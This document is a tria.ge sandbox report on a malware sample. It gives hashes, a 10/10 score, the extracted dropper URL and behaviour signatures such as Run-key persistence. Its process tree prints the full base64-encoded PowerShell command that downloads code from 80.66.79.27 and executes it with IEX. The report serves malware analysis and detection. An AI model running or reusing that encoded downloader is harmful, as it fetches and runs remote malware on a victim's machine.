Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    117s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20230824-en
  • resource tags

    arch:x64arch:x86image:win7-20230824-enlocale:en-usos:windows7-x64system
  • submitted
    30/08/2023, 07:09

General

  • Target

    34577f0fd1d3f1d5f53eecd0aca166c3.exe

  • Size

    37KB

  • MD5

    34577f0fd1d3f1d5f53eecd0aca166c3

  • SHA1

    29ea28cb4255cde4c3e48daf291e76e5cfe7194c

  • SHA256

    c0273620d37a6ee12ce96c34b6f5428d712860c17541812d99b8ee23e9db95b9

  • SHA512

    6605c6d2403ebf7a1cdc0fc866e8c23a0b6967083d8fc66f633d26260e233d8f065941258d761dc599956ff55817961f86ac4ab8ff218c16db2ffa36ed586886

  • SSDEEP

    768:VboCDsyNRn59FDXZFBVqt9OZPlyNRn59FDXZFBVqt9OZPWyNRn59FDXZFBVqt9OU:Vbo90/LDpDVqtoZPl0/LDpDVqtoZPW0K

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://80.66.79.27/o.png

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\34577f0fd1d3f1d5f53eecd0aca166c3.exe
    "C:\Users\Admin\AppData\Local\Temp\34577f0fd1d3f1d5f53eecd0aca166c3.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc IAAkAGMAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABjADQAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAYwAzAD0AJwBhAGQAUwB0AHIAaQBuAGcAKAAnACcAaAB0AHQAcAA6AC8ALwA4ADAALgA2ADYALgA3ADkALgAyADcALwBvAC4AcABuAGcAJwAnACkAJwA7ACQAVABDAD0ASQBgAEUAYABYACAAKAAkAGMAMQAsACQAYwA0ACwAJABjADMAIAAtAEoAbwBpAG4AIAAnACcAKQB8AEkAYABFAGAAWAA=
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1568

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1568-11-0x00000000024C0000-0x0000000002540000-memory.dmp

    Filesize

    512KB

  • memory/1568-7-0x000000001B450000-0x000000001B732000-memory.dmp

    Filesize

    2.9MB

  • memory/1568-8-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

    Filesize

    9.6MB

  • memory/1568-10-0x00000000024C0000-0x0000000002540000-memory.dmp

    Filesize

    512KB

  • memory/1568-12-0x00000000024C0000-0x0000000002540000-memory.dmp

    Filesize

    512KB

  • memory/1568-9-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

    Filesize

    32KB

  • memory/1568-13-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

    Filesize

    9.6MB

  • memory/1568-14-0x00000000024C0000-0x0000000002540000-memory.dmp

    Filesize

    512KB

  • memory/1568-15-0x0000000002AB0000-0x0000000002AC0000-memory.dmp

    Filesize

    64KB

  • memory/1568-16-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2288-1-0x00000000009B0000-0x00000000009C0000-memory.dmp

    Filesize

    64KB

  • memory/2288-2-0x000007FEF60B0000-0x000007FEF6A9C000-memory.dmp

    Filesize

    9.9MB

  • memory/2288-0-0x000007FEF60B0000-0x000007FEF6A9C000-memory.dmp

    Filesize

    9.9MB